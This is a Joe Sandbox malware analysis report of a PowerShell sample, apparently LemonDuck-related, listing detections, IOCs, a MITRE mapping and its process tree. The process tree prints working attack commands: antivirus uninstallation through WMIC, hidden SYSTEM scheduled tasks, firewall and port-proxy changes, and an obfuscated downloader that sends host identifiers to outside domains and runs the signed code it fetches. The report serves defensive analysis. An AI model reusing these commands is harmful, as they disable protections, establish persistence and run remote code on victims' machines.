
ID: 435601
Sample Name: malicious.ps1
Cookbook: default.jbs
Time: 18:26:42
Date: 16/06/2021
Version: 32.0.0 Black Diamond

Table of Contents

Table of Contents  2
Windows Analysis Report malicious.ps1  4
  Overview  4
    General Information  4
    Detection  4
    Signatures  4
    Classification  4
    Process Tree  4
  Malware Configuration  5
  Yara Overview  6
  Sigma Overview  6
    System Summary:  6
    Persistence and Installation Behavior:  6
  Signature Overview  6
    AV Detection:  6
    System Summary:  6
    Data Obfuscation:  6
    Persistence and Installation Behavior:  6
    Boot Survival:  6
    Malware Analysis System Evasion:  6
    Lowering of HIPS / PFW / Operating System Security Settings:  6
  Mitre Att&ck Matrix  7
  Behavior Graph  7
  Screenshots  8
    Thumbnails  8
  Antivirus, Machine Learning and Genetic Malware Detection  9
    Initial Sample  9
    Dropped Files  9
    Unpacked PE Files  9
    Domains  9
    URLs  9
  Domains and IPs  10
    Contacted Domains  10
    Contacted URLs  10
    URLs from Memory and Binaries  10
    Contacted IPs  10
      Public  10
  General Information  10
  Simulations  11
    Behavior and APIs  11
  Joe Sandbox View / Context  11
    IPs  11
    Domains  11
    ASN  12
    JA3 Fingerprints  12
    Dropped Files  12
  Created / dropped Files  12
  Static File Info  19
    General  19
    File Icon  19
  Network Behavior  19
    Network Port Distribution  19
    TCP Packets  19
    UDP Packets  19
    DNS Queries  19
    DNS Answers  20
    HTTP Request Dependency Graph  20
    HTTP Packets  20
  Code Manipulations  21
  Statistics  21
    Behavior  21
  System Behavior  21
    Analysis Process: powershell.exe PID: 7148 Parent PID: 5984  21 (General 21; File Activities 22: File Created 22, File Deleted 22, File Written 22, File Read 22)
    Analysis Process: conhost.exe PID: 6164 Parent PID: 7148  22 (General 22)
    Analysis Process: powershell.exe PID: 5916 Parent PID: 7148  22 (General 22; File Activities 22: File Created 23, File Deleted 23, File Written 23, File Read 23)
    Analysis Process: cmd.exe PID: 2856 Parent PID: 7148  23 (General 23; File Activities 23)
    Analysis Process: WMIC.exe PID: 6488 Parent PID: 2856  23 (General 23; File Activities 23: File Written 23)
    Analysis Process: cmd.exe PID: 1076 Parent PID: 7148  23 (General 23; File Activities 24)
    Analysis Process: WMIC.exe PID: 5216 Parent PID: 1076  24 (General 24; File Activities 24: File Written 24)
    Analysis Process: cmd.exe PID: 5960 Parent PID: 7148  24 (General 24)
    Analysis Process: WMIC.exe PID: 6176 Parent PID: 5960  24 (General 24)
    Analysis Process: cmd.exe PID: 2240 Parent PID: 7148  25 (General 25)
    Analysis Process: WMIC.exe PID: 6332 Parent PID: 2240  25 (General 25)
    Analysis Process: cmd.exe PID: 6172 Parent PID: 7148  25 (General 25)
    Analysis Process: WMIC.exe PID: 6796 Parent PID: 6172  26 (General 26)
    Analysis Process: cmd.exe PID: 4904 Parent PID: 7148  26 (General 26)
    Analysis Process: WMIC.exe PID: 6992 Parent PID: 4904  26 (General 26)
    Analysis Process: cmd.exe PID: 4780 Parent PID: 7148  27 (General 27)
    Analysis Process: WMIC.exe PID: 7032 Parent PID: 4780  27 (General 27)
    Analysis Process: cmd.exe PID: 7048 Parent PID: 7148  27 (General 27)
    Analysis Process: schtasks.exe PID: 1668 Parent PID: 7148  27 (General 27)
    Analysis Process: schtasks.exe PID: 3880 Parent PID: 7148  28 (General 28)
    Analysis Process: powershell.exe PID: 6132 Parent PID: 968  28 (General 28)
    Analysis Process: conhost.exe PID: 4676 Parent PID: 6132  28 (General 28)
    Analysis Process: schtasks.exe PID: 5448 Parent PID: 7148  29 (General 29)
    Analysis Process: schtasks.exe PID: 5756 Parent PID: 7148  29 (General 29)
    Analysis Process: schtasks.exe PID: 6036 Parent PID: 7148  29 (General 29)
    Analysis Process: powershell.exe PID: 2804 Parent PID: 968  29 (General 29)
    Analysis Process: conhost.exe PID: 6980 Parent PID: 2804  30 (General 30)
    Analysis Process: schtasks.exe PID: 5628 Parent PID: 7148  30 (General 30)
    Analysis Process: schtasks.exe PID: 6372 Parent PID: 7148  30 (General 30)
    Analysis Process: powershell.exe PID: 6620 Parent PID: 968  31 (General 31)
    Analysis Process: conhost.exe PID: 6300 Parent PID: 6620  31 (General 31)
    Analysis Process: cmd.exe PID: 6672 Parent PID: 7148  31 (General 31)
    Analysis Process: netsh.exe PID: 5840 Parent PID: 6672  32 (General 32)
    Analysis Process: netsh.exe PID: 6508 Parent PID: 7148  32 (General 32)
    Analysis Process: netsh.exe PID: 6668 Parent PID: 7148  32 (General 32)
    Analysis Process: netsh.exe PID: 5772 Parent PID: 7148  32 (General 32)
    Analysis Process: schtasks.exe PID: 4244 Parent PID: 7148  33 (General 33)
    Analysis Process: schtasks.exe PID: 6176 Parent PID: 7148  33 (General 33)
    Analysis Process: schtasks.exe PID: 2464 Parent PID: 7148  33 (General 33)
    Analysis Process: schtasks.exe PID: 4968 Parent PID: 7148  34 (General 34)
  Disassembly  34
    Code Analysis  34

Copyright Joe Security LLC 2021 Page 2 of 34

Windows Analysis Report malicious.ps1

Overview

General Information

Sample Name: malicious.ps1
Analysis ID: 435601
MD5: 75f885a4e9484ce…
SHA1: cd3ef6f1125a23a…
SHA256: 7829a0b0e536f60…
Infos:
Most interesting Screenshot:

Detection

Detection: malicious (scale: malicious, suspicious, clean)
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Classification

Classification chart labels: Ransomware, Miner, Spreading, Phishing, Evader, Exploiter, Banker, Spyware, Trojan / Bot, Adware

Signatures

Multi AV Scanner detection for doma…
Sigma detected: Schedule system p…
Creates files in the system32 config…
Modifies the windows firewall
Obfuscated command line found
Powershell drops PE file
Renames powershell.exe to bypass …
Suspicious powershell command line…
Uses netsh to modify the Windows n…
Uses schtasks.exe or at.exe to add …
Contains capabilities to detect virtua…
Contains long sleeps (>= 3 min)
Creates a process in suspended mo…
Creates files inside the system direc…
Creates or modifies windows services
Deletes files inside the Windows fold…
Detected potential crypto function
Dropped file seen in connection with…
Drops PE files
Drops PE files to the windows direct…
Enables debug privileges
Found a high number of Window / Us…
HTTP GET or POST without a user …
IP address seen in connection with o…
Internet Provider seen in connection…
May sleep (evasive loops) to hinder…
Monitors certain registry keys / valu…
PE file contains strange resources
Queries sensitive Operating System…
Queries the volume information (nam…
Sigma detected: Netsh Port Forward…
Sigma detected: Netsh Port or Appli…
Sigma detected: Non Interactive Pow…
Uses code obfuscation techniques (…
Very long cmdline option found, this…

Process Tree

System is w10x64

powershell.exe (PID: 7148 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\malicious.ps1' MD5: 95000560239032BC68B4C2FDFCDEF913)
  conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  powershell.exe (PID: 5916 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -c IEx =gim MD5: 95000560239032BC68B4C2FDFCDEF913)
  cmd.exe (PID: 2856 cmdline: 'C:\Windows\system32\cmd.exe' /c /b wmic.exe product where 'name like '%Eset%'' call uninstall /nointeractive MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    WMIC.exe (PID: 6488 cmdline: wmic.exe product where 'name like '%Eset%'' call uninstall /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
  cmd.exe (PID: 1076 cmdline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%%Kaspersky%%'' call uninstall /nointeractive MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    WMIC.exe (PID: 5216 cmdline: wmic.exe product where 'name like '%%Kaspersky%%'' call uninstall /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
  cmd.exe (PID: 5960 cmdline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%avast%'' call uninstall /nointeractive MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    WMIC.exe (PID: 6176 cmdline: wmic.exe product where 'name like '%avast%'' call uninstall /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
  cmd.exe (PID: 2240 cmdline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%avp%'' call uninstall /nointeractive MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    WMIC.exe (PID: 6332 cmdline: wmic.exe product where 'name like '%avp%'' call uninstall /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
  cmd.exe (PID: 6172 cmdline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%Security%'' call uninstall /nointeractive MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    WMIC.exe (PID: 6796 cmdline: wmic.exe product where 'name like '%Security%'' call uninstall /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
  cmd.exe (PID: 4904 cmdline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%AntiVirus%'' call uninstall /nointeractive MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    WMIC.exe (PID: 6992 cmdline: wmic.exe product where 'name like '%AntiVirus%'' call uninstall /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
  cmd.exe (PID: 4780 cmdline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%Norton Security%'' call uninstall /nointeractive MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    WMIC.exe (PID: 7032 cmdline: wmic.exe product where 'name like '%Norton Security%'' call uninstall /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
  cmd.exe (PID: 7048 cmdline: 'C:\Windows\system32\cmd.exe' /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  schtasks.exe (PID: 1668 cmdline: 'C:\Windows\system32\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn blackball1 /F /tr blackball1 MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  schtasks.exe (PID: 3880 cmdline: 'C:\Windows\system32\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \hOSkYCwoL /F /tr 'powershell -w hidden -c PS_CMD' MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  schtasks.exe (PID: 5448 cmdline: 'C:\Windows\system32\schtasks.exe' /run /tn \hOSkYCwoL MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  schtasks.exe (PID: 5756 cmdline: 'C:\Windows\system32\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn RabFBPMZ\r1JNCdQED0 /F /tr 'powershell -w hidden -c PS_CMD' MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  schtasks.exe (PID: 6036 cmdline: 'C:\Windows\system32\schtasks.exe' /run /tn RabFBPMZ\r1JNCdQED0 MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  schtasks.exe (PID: 5628 cmdline: 'C:\Windows\system32\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \Windows\k7xmVIWZ\FKaz6wpoqO /F /tr 'powershell -w hidden -c PS_CMD' MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  schtasks.exe (PID: 6372 cmdline: 'C:\Windows\system32\schtasks.exe' /run /tn MicroSoft\Windows\k7xmVIWZ\FKaz6wpoqO MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  cmd.exe (PID: 6672 cmdline: 'C:\Windows\system32\cmd.exe' /c netsh.exe firewall add portopening tcp 65529 SDNSd MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    netsh.exe (PID: 5840 cmdline: netsh.exe firewall add portopening tcp 65529 SDNSd MD5: 98CC37BBF363A38834253E22C80A8F32)
  netsh.exe (PID: 6508 cmdline: 'C:\Windows\system32\netsh.exe' interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53 MD5: 98CC37BBF363A38834253E22C80A8F32)
  netsh.exe (PID: 6668 cmdline: 'C:\Windows\system32\netsh.exe' advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block MD5: 98CC37BBF363A38834253E22C80A8F32)
  netsh.exe (PID: 5772 cmdline: 'C:\Windows\system32\netsh.exe' advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block MD5: 98CC37BBF363A38834253E22C80A8F32)
  schtasks.exe (PID: 4244 cmdline: 'C:\Windows\system32\schtasks.exe' /delete /tn blackball /F MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  schtasks.exe (PID: 6176 cmdline: 'C:\Windows\system32\schtasks.exe' /delete /tn t.pp6r1.com /F MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  schtasks.exe (PID: 2464 cmdline: 'C:\Windows\system32\schtasks.exe' /delete /tn Rtsa2 /F MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  schtasks.exe (PID: 4968 cmdline: 'C:\Windows\system32\schtasks.exe' /delete /tn Rtsa1 /F MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
powershell.exe (PID: 6132 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c PS_CMD MD5: 95000560239032BC68B4C2FDFCDEF913)
  conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
powershell.exe (PID: 2804 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient).'DownloadData'($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('xpVT7bCpITDUjAvmzli55WPVFPjQBos7o9/ZbbWzyeaKIn9NLJwvY6ad3rMGoXzT6mz+51VupKm5TQvk79oVK4QQDZErhr0szpUdW79j2WPhbmpZrwMdgmFHrqG6Np+InWy/V1acp09/W9x54mpQ1EHIos1+JhSrYPaq8WtsGW0=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.oul'+'er.cc';a($url+'/a.jsp?_20210616?'+ (@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*')) MD5: 95000560239032BC68B4C2FDFCDEF913)
  conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
powershell.exe (PID: 6620 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient).'DownloadData'($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('xpVT7bCpITDUjAvmzli55WPVFPjQBos7o9/ZbbWzyeaKIn9NLJwvY6ad3rMGoXzT6mz+51VupKm5TQvk79oVK4QQDZErhr0szpUdW79j2WPhbmpZrwMdgmFHrqG6Np+InWy/V1acp09/W9x54mpQ1EHIos1+JhSrYPaq8WtsGW0=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.nte'+'le.net';a($url+'/a.jsp?_20210616?'+ (@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*')) MD5: 95000560239032BC68B4C2FDFCDEF913)
  conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Netsh Port Forwarding

Sigma detected: Netsh Port or Application Allowed

Sigma detected: Non Interactive PowerShell

Persistence and Installation Behavior:

Sigma detected: Schedule system process

Signature Overview


AV Detection:

Multi AV Scanner detection for domain / URL

System Summary:

Powershell drops PE file

Data Obfuscation:

Obfuscated command line found

Suspicious powershell command line found

Persistence and Installation Behavior:

Creates files in the system32 config directory

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Malware Analysis System Evasion:

Renames powershell.exe to bypass HIPS

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies the windows firewall

Uses netsh to modify the Windows network and firewall settings

Mitre Att&ck Matrix

Matrix cells grouped by tactic column (the numbers after a technique name are the counts shown in the matrix):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise

Execution: Windows Management Instrumentation 1; Command and Scripting Interpreter 1 1; Scheduled Task/Job 1; PowerShell 2 1; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter

Persistence: Windows Service 1; Scheduled Task/Job 1; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job

Privilege Escalation: Windows Service 1; Process Injection 1 2; Scheduled Task/Job 1; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job

Defense Evasion: Masquerading 1 2 1; Disable or Modify Tools 2; Virtualization/Sandbox Evasion 4 1; Process Injection 1 2; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 1; File Deletion 1; Indicator Removal from Tools

Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem

Discovery: Query Registry 1; Security Software Discovery 2 1; Process Discovery 2; Virtualization/Sandbox Evasion 4 1; Application Window Discovery 1; Remote System Discovery 1; File and Directory Discovery 1; System Information Discovery 2 1

Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot

Collection: Archive Collected Data 1; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol

Command and Control: Encrypted Channel 1; Ingress Tool Transfer 1; Non-Application Layer Protocol 2; Application Layer Protocol 2; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol

Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols

Behavior Graph

[Behavior graph rendered as an image in the original report; the recoverable labels follow.]

Behavior Graph ID: 435601
Sample: malicious.ps1
Startdate: 16/06/2021
Architecture: WINDOWS
Score: 88

Legend: Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet

Graph nodes: powershell.exe (four instances) starting cmd.exe (three shown, plus 22 other processes) and conhost.exe (three shown); cmd.exe starting WMIC.exe (six shown, plus 2 other processes); dropped file C:\Windows\System32\...\ncETd2A.exe (PE32+)

Network nodes: cvc.7766.org (209.141.33.145, ports 49758 and 80, PONYNETUS, United States); t.ouler.cc; t.ntele.net; 1.1.1.1 (CLOUDFLARENETUS, Australia)

Signatures attached to the graph: Multi AV Scanner detection for domain / URL; Sigma detected: Schedule system process; Suspicious powershell command line found; Obfuscated command line found; Uses schtasks.exe or at.exe to add and modify task schedules; Modifies the windows firewall; Powershell drops PE file; Renames powershell.exe to bypass HIPS; Creates files in the system32 config directory; Uses netsh to modify the Windows network and firewall settings

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source | Detection | Scanner
C:\Windows\System32\WindowsPowerShell\v1.0\ncETd2A.exe | 3% | Metadefender
C:\Windows\System32\WindowsPowerShell\v1.0\ncETd2A.exe | 0% | ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
cvc.7766.org | 9% | Virustotal |
t.ntele.net | 7% | Virustotal |
t.ouler.cc | 11% | Virustotal |

URLs

Source | Detection | Scanner | Label
crl.m | 0% | URL Reputation | safe (4 identical rows)
pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe (4 identical rows)
t.ouler.cc/a.jsp?_20210616?computer*computer$*FB9C3542-FA73-1B4E-FBA4-60E77BE54AED*903551864 | 0% | Avira URL Cloud | safe
https://go.micro | 0% | URL Reputation | safe (4 identical rows)
https://contoso.com/ | 0% | URL Reputation | safe (4 identical rows)
https://contoso.com/License | 0% | URL Reputation | safe (4 identical rows)
https://contoso.com/Icon | 0% | URL Reputation | safe (4 identical rows)

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
cvc.7766.org | 209.141.33.145 | true | true | 9%, Virustotal | unknown
t.ntele.net | unknown | unknown | true | 7%, Virustotal | unknown
t.ouler.cc | unknown | unknown | true | 11%, Virustotal | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
t.ouler.cc/a.jsp?_20210616?computer*computer$*FB9C3542-FA73-1B4E-FBA4-60E77BE54AED*903551864 | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | false
209.141.33.145 | cvc.7766.org | United States | 53667 | PONYNETUS | true

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 435601
Start date: 16.06.2021
Start time: 18:26:42
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 42s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: malicious.ps1
Cookbook file name: default.jbs
Analysis system description: 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 56
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled; EGA enabled; HDC enabled; AMSI enabled
Analysis Mode: default
Analysis stop reason:
Detection: MAL
Classification: mal88.evad.winPS1@73/34@3/2
EGA Information: Failed
HDC Information: Failed
HCA Information: Successful, ratio: 95%
Number of executed functions: 0
Number of non-executed functions: 0
Cookbook Comments: Adjust boot time; Enable AMSI; Found application associated with file extension: .ps1
Warnings:

Simulations

Behavior and APIs

Time | Type | Description
18:27:31 | API Interceptor | 221x call for process: powershell.exe modified
18:28:12 | API Interceptor | 7x Sleep call for process: WMIC.exe modified
18:28:21 | Task Scheduler | Run new task: blackball1 : blackball1
18:28:21 | Task Scheduler | Run new task: hOSkYCwoL path: powershell s>-w hidden -c PS_CMD

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
1.1.1.1 | QQ9.0.1.exe | malicious | url-quality-stat.xf.qq.com/Analyze/Data?v=1&&format=json&&qq=0&&cmd=21&&product=qqdownload

Domains

Match Associated Sample Name / URL SHA 256 Detection Link Context

ASN

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Context
Oginal BL-Invoice & Packing List.exe | malicious | 104.21.19.200
e621ca05.exe | malicious | 104.20.184.68
app.exe | malicious | 172.67.131.148
unk.exe | malicious | 172.67.137.101
(786) 545-7301-Saisd.net.html | malicious | 104.16.18.94
TrueKey.exe | malicious | 162.159.137.232
file4.exe | malicious | 172.67.158.27
file3s.exe | malicious | 104.21.10.13
Request for Quotation # 3200025006.exe | malicious | 104.21.46.55
SOA_16.06.21.exe | malicious | 172.67.188.154
SKMBT69150632L.exe | malicious | 172.67.128.232
chems.exe | malicious | 172.67.161.52
Price inquiry.16.06.2021.pdf.exe | malicious | 172.67.188.154
efXOVjQ8K7.exe | malicious | 104.21.14.60
INVOICE.htm | malicious | 104.16.18.94
PFF_FK_2021020040.doc | malicious | 104.21.14.60
090000090.exe | malicious | 172.67.188.154
Quotation Mitchell_RFQ_36496.exe | malicious | 104.21.15.48
payment confirmation for our 30% deposit.exe | malicious | 23.227.38.74
O532dms5LV.exe | malicious | 172.67.158.27

Match: PONYNETUS
Associated Sample Name / URL | Detection | Context
SecuriteInfo.com.Trojan.PackedNET.835.27578.exe | malicious | 209.141.34.39
FLI_0741000.doc | malicious | 209.141.34.39
SecuriteInfo.com.BackDoor.Rat.281.18292.exe | malicious | 198.98.57.207
3dHwCEZMSu.exe | malicious | 209.141.34.39
RFL0784510200.exe | malicious | 209.141.59.251
CZPJKhArIM.exe | malicious | 198.98.49.129
jRrdnjW5EV.exe | malicious | 209.141.34.39
exxsdee.x86 | malicious | 205.185.126.254
exxsdee.arm7 | malicious | 205.185.126.254
IMG_15_60_103_681.xlsx | malicious | 198.98.60.43
HUa0EaTZco.exe | malicious | 205.185.127.90
WEDWOxq7uf | malicious | 205.185.124.100
67k23Rdo5x.exe | malicious | 199.195.253.181
ANBoKU1Ei8.exe | malicious | 199.195.253.181
AN_8383883773636.xlsx | malicious | 199.195.253.181
IMG_61_023_088.xls | malicious | 209.141.61.124
IMG_61_023_088 (1).xls | malicious | 209.141.61.124
IMG_065017223.xls | malicious | 209.141.61.124
IMG_61_023_088.xls | malicious | 209.141.61.124
IMG_61_023_088 (1).xls | malicious | 209.141.61.124

JA3 Fingerprints

No context

Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Windows\System32\WindowsPowerShell\v1.0\ncETd2A.exe | mltqanainst.exe | malicious
C:\Windows\System32\WindowsPowerShell\v1.0\ncETd2A.exe | lemonduck.bat | malicious

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  File Type: data
  Category: dropped
  Size (bytes): 21038
  Entropy (8bit): 4.909029203424605
  Encrypted: false
  SSDEEP: 384:Xwib4L+kjh4iUxm44Qib4wrwib4LEVoGIpN6KQkj2jkjh4iUxm44Qib4w:XEjh4iUxm44jrEEV3IpNBQkj22h4iUx+
  MD5: CB7670859EF4E8A4EDC879121F0786C8
  SHA1: F5BB43F6ACC66809D257334D8EB2713B99AB4BA6
  SHA-256: 79CFAAA518DFDC3517EDDF54656E753C5943BE6B466B5EBCD18D416D7E94F7AB
  SHA-512: C3B32DC42E494AF5D323D589A9571A0A11B308FAFADA65EC25241837B8B73976E26C50E8911D29C9D905D1D3C8C5D773AA7B3798E1479201F2CFC6DE3D6A5A43
  Malicious: false
  Preview: PSMODULECACHE...... S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1...... Uninstall-Module...... inmo...... fimo...... Install-Module...... New-ScriptFileInfo...... Publish-Module...... Install-Script...... Update-Script...... -Command...... Update-ModuleManifest...... Find-DscResource...... Save-Module...... Save-Script...... upmo...... Uninstall-Script...... Get-InstalledScript...... Update-Module...... Register-PSRepository...... Find-Script...... Unregister-PSRepository...... pumo...... Test-ScriptFileInfo...... Update-ScriptFileInfo...... Set-PSRepository...... Get-PSRepository...... Get-InstalledModule...... Find-Module...... Find-RoleCapability...... Publish-Script...... Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1...... Describe...... Get-TestDriveItem...... New-Fixture...... In...... Invoke-Mock...... InModuleScope...... Mock...... SafeGetCommand...... Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  File Type: data
  Category: dropped
  Size (bytes): 1200
  Entropy (8bit): 5.32145086887235
  Encrypted: false
  SSDEEP: 24:3UCPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKzxxM:lPerB4nqRL/HvFe9t4Cv94ExxM
  MD5: 07DF35DAA7B52B034E14D21B9729EF73
  SHA1: DEB973ED2B3F9A550E297305E467AD54BE5B0A42
  SHA-256: BAE7322FFE6007C884E1FD14EBE25C1A8BC14E6695DE03EE4D6787687DE1116C
  SHA-512: 34AF106F67A5E776FC590565F1285FDD82B11D6CD971C18AC83380FE298D408CBC58729E7D0BDBB38FD1675581657ED80BCAF6F318EA4D6449D1D46C6BF63839
  Malicious: false
  Preview: @...e...... @...... 8...... '....L..}...... System.Numerics.H...... <@.^.L."My...:...... Microsoft.PowerShell.ConsoleHost0...... G-.o.. .A...4B...... System..4...... [...{a.C..%6..h...... System.Core.D...... fZve...F.....x.)...... System.Management.AutomationL...... 7.....J@...... ~...... #.Microsoft.Management.Infrastructure.<...... H..QN.Y.f...... System.Management...@...... Lo...QN......

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0w0oqh2u.0kt.psm1
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  File Type: very short file (no magic)
  Category: dropped
  Size (bytes): 1
  Entropy (8bit): 0.0
  Encrypted: false
  SSDEEP: 3:U:U
  MD5: C4CA4238A0B923820DCC509A6F75849B
  SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
